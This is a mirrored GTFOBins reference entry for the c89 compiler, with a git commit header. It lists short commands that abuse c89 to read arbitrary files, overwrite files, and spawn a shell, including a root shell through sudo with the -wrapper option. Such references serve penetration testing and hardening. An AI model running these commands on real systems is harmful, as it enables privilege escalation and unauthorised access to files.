1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/c89.md
Michalis Papadopoullos 7c9c505542
Add c89 and c99
2021-06-04 13:54:33 +02:00

327 B

functions
file-read file-write shell sudo
code
LFILE=file_to_read c89 -x c -E "$LFILE"
code
LFILE=file_to_delete c89 -xc /dev/null -o $LFILE
code
c89 -wrapper /bin/sh,-s .
code
sudo c89 -wrapper /bin/sh,-s .